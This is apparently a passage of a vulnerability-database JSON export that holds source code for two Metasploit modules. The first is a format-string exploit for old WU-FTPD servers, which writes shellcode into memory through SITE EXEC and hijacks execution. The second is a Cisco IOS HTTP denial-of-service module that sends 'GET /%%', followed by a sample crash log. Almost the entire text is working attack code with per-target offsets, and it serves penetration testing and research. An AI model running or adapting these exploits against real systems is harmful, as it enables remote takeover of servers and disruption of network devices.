'WU-FTPD SITE EXEC/INDEX Format String Vulnerability',\n 'Description' => %q{\n This module exploits a format string vulnerability in versions of the\n Washington University FTP server older than 2.6.1. By executing\n specially crafted SITE EXEC or SITE INDEX commands containing format\n specifiers, an attacker can corrupt memory and execute arbitrary code.\n },\n 'Author' => [ 'jduck' ],\n 'References' =>\n [\n ['CVE', '2000-0573'],\n ['OSVDB', '11805'],\n ['BID', '1387']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PrependChrootBreak' => true\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n # format string max length\n 'Space' => 256,\n # NOTE: \\xff's need to be doubled (per ftp/telnet stuff)\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\",\n 'DisableNops'\t=> 'True',\n 'StackAdjustment' \t=> -1500\n },\n 'Platform' => [ 'linux' ],\n 'Targets' =>\n [\n #\n # Automatic targeting via fingerprinting\n #\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n #\n # specific targets\n #\n [\t'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 3,\n 'NumPops' \t=> 8,\n 'AddrPops' => 100,\n 'Offset' => -2088, \t\t\t# offset to stack return\n 'Writable' \t=> 0xbfffde26, \t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 0xbffff1e4\t\t# stack return addr\n }\n ],\n # these aren't exploitable (using built-in, stripped down vsprintf, no %n)\n #[\t'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',\n #[\t'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',\n #[\t'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',\n [\t'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',\n {\n 'UseDPA' \t=> true,\n 'PadBytes'\t=> 2,\n 'NumPops' \t=> 276,\n 'AddrPops' => 2,\n 'Offset' => -17664, \t\t\t# offset to stack return\n 'Writable' \t=> 0x806e726,\t\t# bss\n #'Writable' \t=> 0xbfff0126,\t\t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 0xbfffb028\t\t# stack return addr\n #'FlowHook' => 0x806e1e0\t\t# GOT of sprintf\n }\n ],\n\n #\n # this one will detect the parameters automagicly\n #\n [\t'Debug',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 0,\n 'NumPops' \t=> 0,\n 'AddrPops' => -1,\n 'Offset' => -1,\n 'Writable' \t=> 0x41414242, \t#\n 'FlowHook'\t=> 0x43434545\t\t#\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 22 2000'))\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n\n def check\n # NOTE: We don't care if the login failed here...\n ret = connect_login\n\n # We just want the banner to check against our targets..\n vprint_status(\"FTP Banner: #{banner.strip}\")\n status = Exploit::CheckCode::Safe\n if banner =~ /Version wu-2\\.(4|5)/\n status = Exploit::CheckCode::Appears\n elsif banner =~ /Version wu-2\\.6\\.0/\n status = Exploit::CheckCode::Appears\n end\n\n # If we've made it this far, we care if login succeeded.\n if (ret)\n # NOTE: vulnerable and exploitable might not mean the same thing here :)\n if not fmtstr_detect_vulnerable\n status = Exploit::CheckCode::Safe\n end\n if not fmtstr_detect_exploitable\n status = Exploit::CheckCode::Safe\n end\n end\n\n disconnect\n return status\n end\n\n\n def exploit\n\n if (not connect_login)\n fail_with(Failure::Unknown, 'Unable to authenticate')\n end\n\n # Use a copy of the target\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n if (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then\n print_status(\"FTP Banner: #{banner.strip}\")\n version = m[1]\n else\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n regexp = Regexp.escape(version)\n self.targets.each do |t|\n if (t.name =~ /#{regexp}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n if banner\n print_status(\"FTP Banner: #{banner.strip}\")\n end\n end\n\n # proceed with chosen target...\n\n # detect stuff!\n if mytarget.name == \"Debug\"\n #fmtstr_set_caps(true, true)\n # dump the stack, so we can detect stuff magically\n print_status(\"Dumping the stack...\")\n stack = Array.new\n extra = \"aaaabbbb\"\n 1000.times do |x|\n dw = fmtstr_stack_read(x+1, extra)\n break if not dw\n stack << dw\n end\n\n stack_data = stack.pack('V*')\n print_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data))\n\n # detect the number of pad bytes\n idx = stack_data.index(\"aaaabbbb\")\n if not idx\n fail_with(Failure::Unknown, \"Whoa, didn't find the static bytes on the stack!\")\n end\n num_pad = 0\n num_pad = 4 - (idx % 4) if (idx % 4) > 0\n mytarget.opts['PadBytes'] = num_pad\n\n # calculate the number of pops needed to hit our addr\n num_pops = (idx + num_pad) / 4\n mytarget.opts['NumPops'] = num_pops\n else\n num_pad = mytarget['PadBytes']\n num_pops = mytarget['NumPops']\n sc_loc = mytarget['Writable']\n ret = mytarget['FlowHook']\n end\n\n print_status(\"Number of pad bytes: #{num_pad}\")\n print_status(\"Number of pops: #{num_pops}\")\n\n # debugging -> don't try it!\n return if mytarget.name == \"Debug\"\n\n #print_status(\"ATTACH!\")\n #select(nil,nil,nil,5)\n\n fmtstr_detect_caps\n\n # compute the stack return address using the fmt to leak memory\n addr_pops = mytarget['AddrPops']\n offset = mytarget['Offset']\n if addr_pops > 0\n stackaddr = fmtstr_stack_read(addr_pops)\n print_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\n ret = stackaddr + offset\n end\n\n print_status(\"Writing shellcode to: %#x\" % sc_loc)\n print_status(\"Hijacking control via %#x\" % ret)\n\n\n # no extra bytes before the padding..\n num_start = 0\n\n # write shellcode to 'writable'\n arr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\n\n # process it in groups of 24 (max ~400 bytes per command)\n sc_num = 1\n while arr.length > 0\n print_status(\"Sending part #{sc_num} of the payload...\")\n sc_num += 1\n\n narr = arr.slice!(0..24)\n\n fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\n if res[0,4] == \"500 \"\n fail_with(Failure::Unknown, \"Something went wrong when uploading the payload...\")\n end\n end\n end\n\n\n # write 'writable' addr to flowhook (execute shellcode)\n # NOTE: the resulting two writes must be done at the same time\n print_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\n\n fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n # don't wait for the response here :)\n res = send_cmd(['SITE', 'EXEC', fmtbuf], false)\n\n print_status(\"Your payload should have executed now...\")\n handler\n end\n\n\n #\n # these two functions are used to read stack memory\n # (used by fmtstr_stack_read()\n #\n def trigger_fmt(fmtstr)\n return nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\n send_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\n end\n\n def extract_fmt_output(res)\n if (res =~ /^5.. /)\n #throw \"Crap! Something went wrong while dumping the stack...\"\n return nil\n end\n ret = res.strip.split(/\\r?\\n/)[0]\n ret = ret[6,ret.length]\n return ret\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ftp/wuftpd_site_exec_format.rb"}, {"lastseen": "2019-12-14T08:05:04", "bulletinFamily": "exploit", "description": "This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for \"/%%\", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P.\n", "modified": "2017-11-08T16:00:24", "published": "2007-09-24T14:05:37", "id": "MSF:AUXILIARY/DOS/CISCO/IOS_HTTP_PERCENTPERCENT", "href": "", "type": "metasploit", "title": "Cisco IOS HTTP GET /%% Request Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',\n 'Description' => %q{\n This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.\n },\n 'Author' \t\t=> [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'BID', '1154'],\n [ 'CVE', '2000-0380'],\n [ 'OSVDB', '1302' ],\n ],\n 'DisclosureDate' => 'Apr 26 2000'))\n\n register_options(\n [\n Opt::RPORT(80),\n ])\n\n end\n\n def run\n connect\n\n print_status(\"Sending HTTP DoS packet\")\n\n sploit = \"GET /%% HTTP/1.0\"\n sock.put(sploit + \"\\r\\n\")\n\n disconnect\n end\nend\n\n=begin\n\nPatrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P\n\nIOS info:\n IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P, RELEASE SOFTWARE (fc1)\n Copyright (c) 1986-1999 by cisco Systems, Inc.\n Compiled Mon 12-Apr-99 14:53 by ashah\n\nExample crash:\n\n %Software-forced reload\n Preparing to dump core...\n Router>\n *Mar 1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server\n -Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E\n Queued messages:\n *** EXCEPTION ***\n software forced crash\n program counter = 0x80eaca6\n status register = 0x2700\n vbr at time of exception = 0x4000000\n\n=end\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_http_percentpercent.rb"}]}